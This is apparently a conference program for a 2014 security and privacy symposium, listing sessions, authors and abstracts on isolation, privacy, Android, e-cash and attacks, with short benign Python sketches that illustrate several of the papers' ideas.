Pivot is a new JavaScript isolation framework for web applications. Pivot uses iframes as its low-level isolation containers, but it uses code rewriting to implement synchronous cross-domain interfaces atop the asynchronous cross-frame postMessage() primitive. Pivot layers a distributed scheduling abstraction across the frames, essentially treating each frame as a thread which can invoke RPCs that are serviced by external threads. By rewriting JavaScript call sites, Pivot can detect RPC invocations; Pivot exchanges RPC requests and responses via postMessage(), and it pauses and restarts frames using a novel rewriting technique that translates each frame's JavaScript code into a restartable generator function. By leveraging both iframes and rewriting, Pivot does not need to rewrite all code, providing an order-of-magnitude performance improvement over rewriting-only solutions. Compared to iframe-only approaches, Pivot provides synchronous RPC semantics, which developers typically prefer over asynchronous RPCs; Pivot also allows developers to use the full, unrestricted JavaScript language, including powerful statements like eval().
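The pause-and-restart trick maps naturally onto generators. The Python sketch below mimics the idea (Pivot itself rewrites JavaScript and moves messages via postMessage()): each isolated component becomes a generator that yields at RPC call sites, and a scheduler resumes it with the RPC result once the asynchronous round-trip completes, so the component's code reads as if the call were synchronous.

```python
# Toy model of Pivot's scheduling idea, using Python generators in place of
# rewritten JavaScript frames and a direct call in place of postMessage().

class RPC:
    def __init__(self, target, method, *args):
        self.target, self.method, self.args = target, method, args

def storage_frame(method, *args):                    # a "frame" that services RPCs
    handlers = {"get_user": lambda uid: {"id": uid, "name": "alice"}}
    return handlers[method](*args)

def app_frame():                                     # "rewritten" app code: yields at each RPC site
    user = yield RPC("storage", "get_user", 42)      # looks synchronous to the developer
    owner = yield RPC("storage", "get_user", user["id"])
    return owner["name"]

def scheduler(gen):
    """Drive a frame generator: perform each yielded RPC, then resume the frame with the reply."""
    try:
        request = next(gen)                          # run until the first RPC call site
        while True:
            response = storage_frame(request.method, *request.args)
            request = gen.send(response)             # restart the paused frame with the result
    except StopIteration as done:
        return done.value

print(scheduler(app_frame()))                        # -> "alice"
```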
SoK: Automated Software Diversity
Per Larsen, Andrei Homescu, Stefan Brunthaler, and Michael Franz (UC Irvine)
The protective qualities of software diversity have been known for at least three decades, and more than two dozen papers on software diversity have been published since 2008 alone. The reason is simple: the weaknesses of commonly adopted defenses and the shift to Internet-based software distribution for traditional and mobile computer systems have caused a resurgence of interest in artificial software diversity. Software diversity offers several unique properties. First, unlike many other defenses, it introduces uncertainty in the target; precise knowledge of the target is a fundamental assumption underlying a wide range of attacks, which makes diversity a broad rather than narrowly focused defense mechanism. Second, diversity offers probabilistic protection similar to cryptography: attacks may succeed by chance, so security relies on high entropy. Finally, the design space of diversifying program transformations is large. As a result, researchers have proposed a diverse range of approaches to software diversity that vary with respect to threat models, security, performance, and practicality.

In this paper, we survey the state of the art in software diversity along these dimensions and highlight fundamental trade-offs between the approaches. We also point to unresolved challenges, such as error reporting, software updating, and information-leakage attacks on diversified software. Finally, we argue that the research community has not yet realized the full reach of software diversity as a protection mechanism, and we call for research into software diversity as a defense against side-channel attacks.
KCoFI: Complete Control-Flow Integrity for Commodity Operating System Kernels
John Criswell, Nathan Dautenhahn, and Vikram Adve (University of Illinois at Urbana-Champaign)
We present a new system, KCoFI, that is the first we know of to provide complete Control-Flow Integrity protection for commodity operating systems without using heavyweight complete memory safety. Unlike previous systems, KCoFI protects commodity operating systems from classical control-flow hijack attacks, return-to-user attacks, and code segment modification attacks. We formally verify a subset of KCoFI's design by modeling several features in small-step semantics and providing a partial proof that the semantics maintain control-flow integrity. The model and proof account for operations such as page table management, trap handlers, context switching, and signal delivery. Our evaluation shows that KCoFI prevents all the gadgets found by an open-source Return Oriented Programming (ROP) gadget-finding tool in the FreeBSD kernel from being used; it also reduces the number of indirect control-flow targets by 98.18%. Our evaluation also shows that the performance impact of KCoFI on web server bandwidth is negligible while file transfer bandwidth using OpenSSH is reduced by an average of 13%, and at worst 27%, across a wide range of file sizes. PostMark, an extremely file-system intensive benchmark, shows 2x overhead. Where comparable numbers are available, the overheads of KCoFI are far lower than heavyweight memory-safety techniques.
Dancing with Giants: Wimpy Kernels for On-demand Isolated I/O
Zongwei Zhou, Miao Yu, and Virgil Gligor (Carnegie Mellon University)
To be trustworthy, security-sensitive applications must be formally verified and hence small and simple (i.e., 'wimpy'). Thus they cannot rely on the variety of basic services available only in large commodity systems (i.e., in 'giants'). To survive, the wimps must securely compose with ('dance with') the giants; i.e., rely on the giants' services, but only after efficiently verifying their results. This paper presents a security architecture that provides a variety of on-demand isolated I/O channels for wimps, without bloating the underlying trusted computing base. We design and implement a wimpy kernel, which runs on top of a micro-hypervisor and guarantees I/O channel isolation. We minimize the size and complexity of the wimpy kernel by safely outsourcing and deprivileging most device-driver subsystem functions to an untrusted commodity OS and user-level code. We illustrate a concrete implementation of the wimpy kernel for a major I/O subsystem, namely the USB subsystem, and a variety of device drivers. Our experimental measurements exhibit the desired minimality and efficiency of the trusted base.

Break

10:00AM - 10:30AM

Session: Privacy and Anonymity

10:30AM - 12:15PM

Best Student Paper Award (of Two)

Bootstrapping Privacy Compliance in Big Data Systems
Shayak Sen (Carnegie Mellon University), Saikat Guha (Microsoft Research, India), Anupam Datta (Carnegie Mellon University), Sriram Rajamani (Microsoft Research, India), Janice Tsai (Microsoft Research, Redmond), and Jeannette Wing (Microsoft Research)
With the rapid increase in cloud services collecting and using user data to offer personalized experiences, ensuring that these services comply with their privacy policies has become a business imperative for building user trust. However, most compliance efforts in industry today rely on manual review processes and audits designed to safeguard user data, and therefore are resource intensive and lack coverage. In this paper, we present our experience building and operating a system to automate privacy policy compliance checking in a large online search engine. Central to the design of the system are (a) LEGALEASE — a language that allows specification of privacy policies that impose restrictions on how user data is handled; and (b) GROK — a data inventory for Map-Reduce-like big data systems that tracks how user data flows among programs by mapping code-level schema elements to datatypes in LEGALEASE, in essence, annotating existing programs with information flow types with minimal human input. Compliance checking is thus reduced to information flow analysis of big data systems. The system, bootstrapped by a small team, checks compliance daily of tens of millions of lines of ever-changing source code written by several thousand developers operating on many petabytes of data. The system has been in operational use for over a year.
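A toy rendering of the reduction to information-flow checking (the real LEGALEASE syntax and GROK inventory are only gestured at here): columns are labeled with policy datatypes, DENY clauses forbid certain datatype-to-purpose flows, and each job's inferred flows are checked against the clauses.

```python
# Toy policy clauses in the spirit of LEGALEASE (not its actual syntax).
POLICY = [
    {"deny": True, "datatype": "IPAddress", "use_for": "Advertising"},
    {"deny": True, "datatype": "SearchQuery", "use_for": "Sharing"},
]

# Toy GROK-style inventory: code-level column names mapped to policy datatypes.
SCHEMA_LABELS = {"clientip": "IPAddress", "rawquery": "SearchQuery", "adid": "AdId"}

def violations(job_flows):
    """job_flows: [(column, purpose)] edges inferred for one data-pipeline job."""
    found = []
    for column, purpose in job_flows:
        datatype = SCHEMA_LABELS.get(column)
        for clause in POLICY:
            if clause["deny"] and clause["datatype"] == datatype and clause["use_for"] == purpose:
                found.append((column, datatype, purpose))
    return found

print(violations([("clientip", "Advertising"), ("adid", "Advertising")]))
# -> [('clientip', 'IPAddress', 'Advertising')]
```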
Formal Analysis of Chaumian Mix Nets with Randomized Partial Checking
Ralf Kuesters and Tomasz Truderung (University of Trier) and Andreas Vogt (University of Applied Sciences Northwest Switzerland)
Mix nets with randomized partial checking (RPC mix nets) were introduced by Jakobsson, Juels, and Rivest as particularly simple and efficient verifiable mix nets. These mix nets have been used in several implementations of prominent e-voting systems to provide vote privacy and verifiability. In RPC mix nets, higher efficiency is traded for a lower level of privacy and verifiability. However, these mix nets have never undergone a rigorous formal analysis. Recently, Khazaei and Wikström even pointed out several severe problems in the original proposal and in implementations of RPC mix nets in e-voting systems, both for so-called re-encryption and Chaumian RPC mix nets. While Khazaei and Wikström proposed several fixes, the security status of Chaumian RPC mix nets (with the fixes applied) has been left open; re-encryption RPC mix nets, as they suggest, should not be used at all.

In this paper, we provide the first formal security analysis of Chaumian RPC mix nets. We propose security definitions that allow one to measure the level of privacy and verifiability RPC mix nets offer, and then based on these definitions, carry out a rigorous analysis. Altogether, our results show that these mix nets provide a reasonable level of privacy and verifiability, and that they are still an interesting option for the use in e-voting systems.
Blind Seer: A Scalable Private DBMS
Vasilis Pappas (Columbia University), Fernando Krell (Columbia University), Binh Vo (Columbia University), Vladimir Kolesnikov (Bell Labs), Tal Malkin (Columbia University), Seung Geol Choi (United States Naval Academy), Wesley George (University of Toronto), Angelos Keromytis (Columbia University), and Steve Bellovin (Columbia University)
Query privacy in secure DBMS is an important feature, although rarely formally considered outside the theoretical community. Because of the high overheads of guaranteeing privacy in complex queries, almost all previous works addressing practical applications consider extremely limited queries (e.g., just keyword search), or provide an extremely weak guarantee of privacy. (In contrast, it is well known how to protect the DB data from unauthorized disclosure.)

In this work, we address a major open problem in private DBs: efficient sublinear search for arbitrary Boolean queries. We consider a scalable DBMS with provable security for all parties, including protection of the data from both the server (which stores encrypted data) and the client (which searches it), as well as protection of the SQL query and access control for the query. We design, build, and evaluate the performance of a rich DBMS system suitable for real-world deployment on today's medium- to large-scale DBs. On a modern server, we are able to query a formula over a 10 TB, 100M-record DB, with 70 searchable index terms per DB row, in time comparable to (insecure) MySQL (many practical queries can be privately executed with work 1.2-3 times slower than MySQL).

We support a rich query set, including searching on arbitrary boolean formulas on keywords and ranges, support for stemming, and free keyword searches over text fields. We identify and permit a reasonable and controlled amount of leakage, proving that no further leakage is possible. In particular, we allow leakage of some search pattern information, but protect the query and data, provide a high level of privacy for individual terms in the executed search formula, and hide the difference between a query that returned no results and a query that returned a very small result set. We also support private and complex access policies, integrated in the search process so that a query with empty result set and a query that fails the policy are hard to tell apart. Ours is the first system that achieves this tradeoff of performance and privacy while supporting such a rich query set. Indeed, there has been no previous work achieving practical sublinear computation, arbitrary boolean formulas, and our level of provable privacy, even without implementation.
Anonize: A Large-Scale Anonymous Survey System
Susan Hohenberger (Johns Hopkins University), Steven Myers (Indiana University), Rafael Pass (Cornell University), and Abhi Shelat (University of Virginia)
A secure ad-hoc survey scheme enables a survey authority to — without any interaction — select an 'ad-hoc' group of registered users based only on their identities (e.g., their email addresses), and create a survey where those — and only those — users can anonymously complete exactly one submission.

We present a formalization of secure ad-hoc surveys and a provably-secure (based on specific intractability assumptions in the Random Oracle Model) implementation, called ANONIZE. Our performance analysis shows that ANONIZE enables securely implementing million-person anonymous surveys using a single modern workstation. As far as we know, ANONIZE constitutes the first implementation of a large-scale anonymous survey system that scales to millions of users.

Lunch

12:15PM - 01:30PM

Session: Android

01:30PM - 02:45PM

Upgrading Your Android, Elevating My Malware: Privilege Escalation Through Mobile OS Updating
Luyi Xing and Xiaorui Pan (Indiana University Bloomington), Rui Wang (Microsoft Research), and Kan Yuan and XiaoFeng Wang (Indiana University Bloomington)
Android is a fast evolving system, with new updates coming out one after another. These updates often completely overhaul a running system, replacing and adding tens of thousands of files across Android's complex architecture, in the presence of critical user data and applications (apps for short). To avoid accidental damages to such data and existing apps, the upgrade process involves complicated program logic, whose security implications, however, are less known. In this paper, we report the first systematic study on the Android updating mechanism, focusing on its Package Management Service (PMS). Our research brought to light a new type of security-critical vulnerabilities, called Pileup flaws, through which a malicious app can strategically declare a set of privileges and attributes on a low-version operating system (OS) and wait until it is upgraded to escalate its privileges on the new system. Specifically, we found that by exploiting the Pileup vulnerabilities, the app can not only acquire a set of newly added system and signature permissions but also determine their settings (e.g., protection levels), and it can further substitute for new system apps, contaminate their data (e.g., cache, cookies of Android default browser) to steal sensitive user information or change security configurations, and prevent installation of critical system services. We systematically analyzed the source code of PMS using a program verification tool and confirmed the presence of those security flaws on all Android official versions and over 3000 customized versions. Our research also identified hundreds of exploit opportunities the adversary can leverage over thousands of devices across different device manufacturers, carriers and countries. To mitigate this threat without endangering user data and apps during an upgrade, we also developed a new detection service, called SecUP, which deploys a scanner on the user's device to capture the malicious apps designed to exploit Pileup vulnerabilities, based upon the vulnerability-related information automatically collected from newly released Android OS images.
The Peril of Fragmentation: Security Hazards in Android Device Driver Customizations
Xiaoyong Zhou, Yeonjoon Lee, and Nan Zhang (School of Informatics and Computing, Indiana University, Bloomington), Muhammad Naveed (Department of Computer Science, University of Illinois at Urbana-Champaign), and Xiaofeng Wang (School of Informatics and Computing, Indiana University, Bloomington)
Android phone manufacturers are under perpetual pressure to move quickly on their new models, continuously customizing Android to fit their hardware. The security implications of this practice are less known, particularly when it comes to the changes made to Android's Linux device drivers, e.g., those for the camera, GPS, NFC, etc. In this paper, we report the first study aimed at a better understanding of this security hazard. Our study is based on ADDICTED, a new tool we built for automatically detecting some types of flaws in customized driver protection. Specifically, on a customized phone, ADDICTED performs dynamic analysis to correlate the operations on a security-sensitive device to its related Linux files, and then determines whether those files are under-protected on the Linux layer by comparing them with their counterparts on an official Android OS. In this way, we can detect a set of likely security flaws on the phone. Using the tool, we analyzed three popular phones from Samsung, identified their likely flaws, and built end-to-end attacks that allow an unprivileged app to take pictures and screenshots, and even log the keys the user enters through the touchscreen. Some of those flaws are found to exist on over a hundred phone models and affect millions of users. We reported the flaws and are helping the manufacturer fix those problems. We further studied the security settings of device files on 2,423 factory images from major phone manufacturers, discovered over 1,000 vulnerable images, and also gained insights about how they are distributed across different Android versions, carriers, and countries.
From Zygote to Morula: Fortifying Weakened ASLR on Android
Byoungyoung Lee (Georgia Institute of Technology), Long Lu (Stony Brook University), Tielei Wang (Georgia Institute of Technology), Taesoo Kim (Massachusetts Institute of Technology), and Wenke Lee (Georgia Institute of Technology)
Despite the ever increasing research efforts on securing Android applications and the high-level system mechanisms, not many works have investigated the security issues of the low-level OS designs, partially due to the belief that the security issues at this level may not differ much from those on Linux. However, we argue that certain Android’s modifications to the Linux design can be at odds with the security mechanisms and thus incur unique threats that are worth immediate attention. We discovered that a system design of Android for speeding up app launches, namely the Zygote process creation model, weakens ASLR because all app processes are created with largely identical memory layouts. We designed both remote and local attacks capable of bypassing the weakened ASLR and executing return-oriented programming on Android. We demonstrated the attacks using real apps, such as Chrome Browser and VLC Player. Further, we designed and implemented Morula, a secure replacement for Zygote. Morula introduces a very small amount of code to Android OS and can be easily adopted by device vendors. Our evaluation shows that, at a sole cost of 13 MB memory usage increase in each running app, Morula allows Android processes to have individually randomized memory layout and even a slightly shorter average launch time, compared to Zygote.
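The root cause is easy to demonstrate: fork() preserves the parent's randomized layout, so every child created from a single Zygote-like parent shares the same addresses, whereas a fresh exec (as in Morula's design) gets a new layout. A small Linux-only illustration, assuming glibc is loadable via ctypes:

```python
import ctypes
import ctypes.util
import os

# Linux-only: compare the address of a libc symbol across fork()ed children.
libc = ctypes.CDLL(ctypes.util.find_library("c"))
parent_addr = ctypes.cast(libc.printf, ctypes.c_void_p).value

for _ in range(3):
    pid = os.fork()
    if pid == 0:                                     # child: inherits the parent's memory layout
        child_addr = ctypes.cast(libc.printf, ctypes.c_void_p).value
        print(f"child {os.getpid()}: printf at {hex(child_addr)}, "
              f"same as parent: {child_addr == parent_addr}")
        os._exit(0)
    os.waitpid(pid, 0)

# Every child prints the same address; re-running the whole script (a fresh exec)
# prints a different one, because ASLR re-randomizes on exec, not on fork.
```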

Break

02:45PM - 03:15PM

Session: E-Cash

03:15PM - 04:30PM

Best Paper Award

Secure Multiparty Computations on Bitcoin
Marcin Andrychowicz (University of Warsaw), Stefan Dziembowski (University of Warsaw and Sapienza University of Rome), Daniel Malinowski, and Łukasz Mazurek (University of Warsaw)
BitCoin is a decentralized digital currency, introduced in 2008, that has recently gained noticeable popularity. Its main features are: (a) it lacks a central authority that controls the transactions, (b) the list of transactions is publicly available, and (c) its syntax allows more advanced transactions than simply transferring the money. The goal of this paper is to show how these properties of BitCoin can be used in the area of secure multiparty computation protocols (MPCs).

Firstly, we show that the BitCoin system provides an attractive way to construct a version of 'timed commitments', where the committer has to reveal his secret within a certain time frame, or to pay a fine. This, in turn, can be used to obtain fairness in some multiparty protocols. Secondly, we introduce a concept of multiparty protocols that work 'directly on BitCoin'. Recall that the standard definition of the MPCs guarantees only that the protocol 'emulates the trusted third party'. Hence ensuring that the inputs are correct, and the outcome is respected is beyond the scope of the definition. Our observation is that the BitCoin system can be used to go beyond the standard 'emulation-based' definition, by constructing protocols that link their inputs and the outputs with the real BitCoin transactions.

As an instantiation of this idea, we construct protocols for secure multiparty lotteries using the BitCoin currency, without relying on a trusted authority (one of these protocols uses the BitCoin-based timed commitments mentioned above). Our protocols guarantee fairness for the honest parties no matter how the loser behaves. For example, if one party interrupts the protocol, then her money is lost and transferred to the honest participants. Our protocols are practical (to demonstrate this we performed their transactions in the actual BitCoin system) and can be used in real life as a replacement for online gambling sites. We think that this paradigm can also have other applications. We discuss some of them.
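A toy sketch of the timed-commitment logic with the Bitcoin machinery stripped away (in the paper the deposit and deadline are enforced by actual BitCoin transactions and scripts, not by a trusted object like this one): the committer publishes a hash and either opens it before the deadline or forfeits the deposit to the other parties.

```python
import hashlib
import os
import time

class TimedCommitment:
    """Toy timed commitment; the paper replaces this trusted object with BitCoin transactions."""

    def __init__(self, secret: bytes, deposit_btc: float, timeout_s: float):
        self.nonce = os.urandom(16)
        self.commitment = hashlib.sha256(self.nonce + secret).hexdigest()
        self.deposit_btc = deposit_btc
        self.deadline = time.time() + timeout_s
        self.opened = False

    def open(self, secret: bytes, nonce: bytes) -> bool:
        ok = (time.time() <= self.deadline and
              hashlib.sha256(nonce + secret).hexdigest() == self.commitment)
        self.opened = self.opened or ok
        return ok

    def settle(self) -> str:
        if self.opened:
            return "secret revealed in time: deposit returned to the committer"
        if time.time() > self.deadline:
            return f"deadline missed: {self.deposit_btc} BTC paid out to the honest parties"
        return "still pending"
```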
Zerocash: Decentralized Anonymous Payments from Bitcoin
Eli Ben-Sasson (Technion), Alessandro Chiesa (MIT), Christina Garman, Matthew Green, and Ian Miers (Johns Hopkins University), Eran Tromer (Tel Aviv University), and Madars Virza (MIT)
Bitcoin provides a new vision for online payments based on a decentralized public transaction ledger. Unfortunately, Bitcoin and its descendants suffer from anonymity issues because much can be learned from the transaction-graph induced by this ledger. In this paper we propose a new approach to improving anonymity in financial systems based on decentralized public ledgers. Our protocol, which we call Zerocash, builds on the previous Zerocoin work of Miers et al. Unlike Zerocoin, which acts as a decentralized 'laundry', we show how to build a complete and working anonymous currency on top of the Bitcoin network. Specifically, Zerocash allows users to transact in a fully-anonymous manner without disclosing a payment’s origin, destination, amount, or links to other payments. Moreover, our protocol is orders of magnitude more efficient than Zerocoin, and is even competitive with Bitcoin. We achieve these results by leveraging recent advances in zero-knowledge Succinct Non-interactive ARguments of Knowledge (zk-SNARKs), as well as a new e-cash protocol. Finally, we implement our techniques and demonstrate that they can be deployed in practice.
PermaCoin: Repurposing Bitcoin Work for Data Preservation
Andrew Miller (University of Maryland), Ari Juels, Elaine Shi (University of Maryland), Bryan Parno (Microsoft Research), and Jonathan Katz (University of Maryland)
Bitcoin is widely regarded as the first broadly successful e-cash system. An oft-cited concern, though, is that the coin-mining process in Bitcoin wastes computational resources. Indeed, Bitcoin’s underlying mining mechanism, which we call a scratch-off puzzle (SOP), involves continuously attempting to solve computational puzzles that have no intrinsic utility.

We propose a modification to Bitcoin that repurposes its mining resources to achieve a more broadly useful goal: distributed storage of archival data. We call our new scheme PermaCoin. Unlike Bitcoin and its proposed alternatives, PermaCoin requires clients to invest not just computational resources, but also storage. Our scheme involves an alternative Scratch-Off Puzzle for Bitcoin based on Proofs-of-Retrievability (PORs). Successfully minting money with this SOP requires local, random access to a copy of a file. Given the competition among mining clients in Bitcoin, this modified SOP gives rise to highly decentralized file storage, thus reducing the overall waste of Bitcoin. Using a model of rational economic agents we show that our modified SOP preserves the essential properties of the original Bitcoin puzzle. We also provide parameterizations and calculations based on realistic hardware constraints to demonstrate the practicality of PermaCoin as a whole.
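A toy version of the storage-bound scratch-off puzzle (parameters and hashing are illustrative, and the real scheme uses proofs of retrievability over an erasure-coded dataset and signed tickets): each attempt forces the miner to read nonce-selected local file segments, so mining throughput is bound by storage rather than by raw hashing alone.

```python
import hashlib

SEGMENTS = [f"archival segment {i}".encode() for i in range(10_000)]  # the miner's local file share
TARGET = 2 ** 240                                                     # toy difficulty target
K = 20                                                                # segments touched per attempt

def scratch_off_attempt(puzzle_id: bytes, pubkey: bytes, nonce: int):
    """One attempt: the nonce selects K segment indices; the ticket hashes their contents."""
    seed = hashlib.sha256(puzzle_id + pubkey + nonce.to_bytes(8, "big")).digest()
    indices = [int.from_bytes(hashlib.sha256(seed + bytes([i])).digest(), "big") % len(SEGMENTS)
               for i in range(K)]
    ticket = hashlib.sha256(seed + b"".join(SEGMENTS[j] for j in indices)).digest()
    return int.from_bytes(ticket, "big") < TARGET, indices

def mine(puzzle_id: bytes, pubkey: bytes, max_tries: int = 1_000_000):
    for nonce in range(max_tries):
        winning, indices = scratch_off_attempt(puzzle_id, pubkey, nonce)
        if winning:
            return nonce, indices    # winning ticket plus the segments whose retrieval it proves
    return None
```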

Break

04:30PM - 05:00PM

Short Talks

05:00PM - 06:00PM

A program for short talks is now available.

Security & Privacy Technical Committee Business Meeting

06:15PM - 07:15PM

May 21


Breakfast

07:00AM - 08:00AM

Closing Remarks

08:00AM - 08:15AM

Session: Miscellaneous

08:15AM - 10:00AM

Cloak and Swagger: Understanding Data Sensitivity Through the Lens of User Anonymity
Sai Teja Peddinti (Polytechnic Institute of New York University) and Aleksandra Korolova, Elie Bursztein, and Geetanjali Sampemane (Google)
Most of what we understand about data sensitivity is through user self-report (e.g., surveys); this paper is the first to use behavioral data to determine content sensitivity, via the clues that users give as to what information they consider private or sensitive through their use of privacy enhancing product features. We perform a large-scale analysis of user anonymity choices during their activity on Quora, a popular question-and-answer site. We identify categories of questions for which users are more likely to exercise anonymity and explore several machine learning approaches towards predicting whether a particular answer will be written anonymously. Our findings validate the viability of the proposed approach towards an automatic assessment of data sensitivity, show that data sensitivity is a nuanced measure that should be viewed on a continuum rather than as a binary concept, and advance the idea that data-mining can be effectively used in order to develop product features that can help keep users safe.
Stopping a Rapid Tornado with a Puff
José Lopes and Nuno Neves (Faculdade de Ciências da Universidade de Lisboa)
RaptorQ is the most advanced fountain code proposed so far. Its properties make it attractive for forward error correction (FEC), offering high reliability at low overheads (i.e., for a small amount of repair information) and efficient encoding and decoding operations. Since RaptorQ's emergence, it has already been standardized by the IETF, and there is the expectation that it will be adopted by several other standardization bodies, in areas related to digital media broadcast, cellular networks, and satellite communications. The paper describes a new attack on RaptorQ that breaks the near ideal FEC performance, by carefully choosing which packets are allowed to reach the receiver. Furthermore, the attack was extended to be performed over secure channels with IPsec/ESP. The paper also proposes a few solutions to protect the code from the attack, which could be easily integrated into the implementations.
SoK: Security and Privacy in Implantable Medical Devices and Body Area Networks
Michael Rushanan (Johns Hopkins University), Colleen Swanson (University of Michigan), Denis Foo Kune (University of Michigan), and Aviel D. Rubin (Johns Hopkins University)
Balancing security, privacy, safety, and utility is a necessity in the health care domain, in which implantable medical devices (IMDs) and body area networks (BANs) have made it possible to continuously and automatically manage and treat a number of health conditions, ranging from cardiac arrhythmia to Parkinson’s. In this work, we provide a clear definition and overview of the problem space, categorizing relevant research results in academia with respect to threats and identifying trends, interdependencies, and directions for future research. We identify three broad research categories aimed at ensuring the security and privacy of the telemetry, software, and physiological sensing interface layers. We find that while the security of the telemetry interface has received much attention in academia, both the threat of software exploitation and the sensor interface layer deserve further attention. In addition, we identify areas of concern in current research, including common sources of confusion in utilizing the MIT PhysioNet portal for key establishment protocols and the use of human tissue simulators; we make concrete recommendations on appropriate methods for future work.
Quantifying Information Flow for Dynamic Secrets
Piotr Mardziel (University of Maryland, College Park), Mario Alvim (University of Pennsylvania), Michael Hicks (University of Maryland, College Park), and Michael Clarkson (George Washington University)
Quantitative information-flow models typically assume that secret information is static. But real-world secrets, such as mobile device locations and account passwords, evolve over time. So it's not just the current value of a secret that matters, but also how the secret changes. If information leaks about how secrets change, adversaries might be able to predict future (or past) secrets. Hiding the correlation between time and the value of a secret can even be more important than hiding the secret itself.
This paper formalizes information flow in the context of dynamic systems with adaptive adversaries, and shows how to quantify leakage of information about secrets and about how secrets change. Careful modeling of the adversary's resources, and his decision about when to attack a system, turns out to be essential. We give operational interpretations of our metrics, relative to well-defined attack scenarios and attacker capabilities.
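
For background, a standard way to quantify leakage about a static secret X from an observation Y is min-entropy leakage, shown below; the paper generalizes this style of measure to secrets that change over time and to adaptive adversaries, so its own metrics differ in detail.

    H_\infty(X) = -\log_2 \max_x \Pr[X = x]
    H_\infty(X \mid Y) = -\log_2 \sum_y \Pr[Y = y] \, \max_x \Pr[X = x \mid Y = y]
    \mathcal{L}(X \to Y) = H_\infty(X) - H_\infty(X \mid Y)

Intuitively, the leakage measures how much the observation improves the adversary's chance of guessing the secret in one try.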

Break

10:00AM - 10:30AM

Session: Attacks 3

10:30AM - 12:15PM

Not-So-Random Numbers in Virtualized Linux and the Whirlwind RNG
Adam Everspaugh, Yan Zhai, Robert Jellinek, Thomas Ristenpart, and Michael Swift (University of Wisconsin)
Virtualized environments are widely thought to cause problems for software-based random number generators (RNGs), due to use of virtual machine (VM) snapshots as well as fewer and believed-to-be lower quality entropy sources. Despite this, we are unaware of any published analysis of the security of critical RNGs when running in VMs. We fill this gap, using measurements of Linux's RNG systems (without the aid of hardware RNGs, the most common use case today) on Xen, VMware, and Amazon EC2. Despite CPU cycle counters providing a significant source of entropy, various deficiencies in the design of the Linux RNG make its first output vulnerable during VM boots and, more critically, make it suffer from catastrophic reset vulnerabilities. We show cases in which the RNG will output the exact same sequence of bits each time it is resumed from the same snapshot. This can compromise, for example, cryptographic secrets generated after resumption. We explore legacy-compatible countermeasures, as well as a clean-slate solution. The latter is a new RNG called Whirlwind that provides a simpler, more-secure solution for providing system randomness.
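
The reset problem can be pictured with a toy deterministic generator (this is not the Linux RNG; the construction below is invented for the sketch): if the generator's state is frozen in a snapshot and no fresh entropy is mixed in on resume, every resumption replays the same output.

    # Toy hash-chain generator, not the Linux RNG. A VM snapshot captures the
    # internal state; resuming twice without adding fresh entropy yields the
    # exact same "random" bytes, which is the reset vulnerability in miniature.
    import copy
    import hashlib

    class ToyDRBG:
        def __init__(self, seed: bytes):
            self.state = hashlib.sha256(seed).digest()

        def read(self, n: int) -> bytes:
            out = b""
            while len(out) < n:
                self.state = hashlib.sha256(self.state).digest()
                out += self.state
            return out[:n]

    rng = ToyDRBG(b"entropy gathered at boot")
    snapshot = copy.deepcopy(rng)            # the snapshot freezes the RNG state

    resume_a = copy.deepcopy(snapshot).read(16)
    resume_b = copy.deepcopy(snapshot).read(16)
    assert resume_a == resume_b              # identical output after every resume
    print(resume_a.hex())
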
Out Of Control: Overcoming Control-Flow Integrity
Enes Göktaş (Vrije Universiteit Amsterdam), Elias Athanasopoulos (Columbia University), Herbert Bos (Vrije Universiteit Amsterdam), and Georgios Portokalidis (Stevens Institute of Technology)
As existing defenses like ASLR, DEP, and stack cookies are not sufficient to stop determined attackers from exploiting our software, interest in Control Flow Integrity (CFI) is growing. In its ideal form, CFI prevents any flow of control that was not intended by the original program, effectively putting a stop to exploitation based on return oriented programming (and many other attacks besides). Two main problems have prevented CFI from being deployed in practice. First, many CFI implementations require source code or debug information that is typically not available for commercial software. Second, in its ideal form, the technique is very expensive. It is for this reason that current research efforts focus on making CFI fast and practical. Specifically, much of the work on practical CFI is applicable to binaries, and improves performance by enforcing a looser notion of control flow integrity. In this paper, we examine the security implications of such looser notions of CFI: are they still able to prevent code reuse attacks, and if not, how hard is it to bypass their protection? Specifically, we show that with two new types of gadgets, return oriented programming is still possible. We assess the availability of our gadget sets, and demonstrate the practicality of these results with a working exploit against Internet Explorer that bypasses modern CFI implementations.
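
A minimal sketch of the kind of loosened policy at issue (the addresses are invented and no real binary is involved): if a return may target any call-preceded address, then every such address remains a legal entry point for a gadget chain.

    # Simplified model of a coarse-grained CFI return policy: any address that
    # immediately follows some call site is an allowed return target. A chain
    # built entirely from call-preceded addresses therefore passes the check.
    call_sites = {0x1000, 0x1050, 0x2000}    # hypothetical call-instruction addresses
    CALL_LEN = 5                             # assume 5-byte call instructions
    valid_return_targets = {addr + CALL_LEN for addr in call_sites}

    def coarse_cfi_allows_return(target: int) -> bool:
        """Looser policy: the target merely has to be call-preceded."""
        return target in valid_return_targets

    rop_chain = [0x1055, 0x2005, 0x1005]     # gadget addresses, all call-preceded
    print(all(coarse_cfi_allows_return(t) for t in rop_chain))   # True
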
Modeling and Discovering Vulnerabilities with Code Property Graphs
Fabian Yamaguchi (University of Goettingen), Nico Golde (Qualcomm Research Germany), and Daniel Arp and Konrad Rieck (University of Goettingen)
The vast majority of security breaches encountered today are a direct result of insecure code. Consequently, the protection of computer systems critically depends on the rigorous identification of vulnerabilities in software, a tedious and error-prone process requiring significant expertise. Unfortunately, a single flaw suffices to undermine the security of a system, and thus the sheer amount of code to audit plays into the attacker's hands.

In this paper, we present a method for effectively mining large amounts of source code for vulnerabilities. To this end, we introduce a novel representation of source code called a code property graph that merges concepts of classic program analysis, namely abstract syntax trees, control flow graphs and program dependence graphs, into a joint data structure. This comprehensive representation enables us to elegantly model templates for common vulnerabilities with graph traversals that, for instance, can identify buffer overflows, integer overflows, format string vulnerabilities or memory address leaks. We implement our approach using a popular graph database and demonstrate its efficacy by identifying 18 previously unknown vulnerabilities in the source code of the Linux kernel.
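
The toy sketch below (using networkx rather than the graph database and traversal language an implementation would use, with node names and edge labels invented for the example) conveys the flavour of such a traversal: follow data-dependence edges from an attacker-controlled source to a dangerous sink.

    # Toy code-property-graph-style query: report calls to a sink that are
    # data-dependent on an attacker-controlled source. Real traversals would
    # also consult AST and control-flow information and check for sanitization.
    import networkx as nx

    cpg = nx.MultiDiGraph()
    cpg.add_node("recv_call", type="Call", name="recv")        # tainted source
    cpg.add_node("len_var", type="Identifier", name="len")
    cpg.add_node("memcpy_call", type="Call", name="memcpy")    # potential sink

    cpg.add_edge("recv_call", "len_var", label="REACHES")      # data-dependence edges
    cpg.add_edge("len_var", "memcpy_call", label="REACHES")

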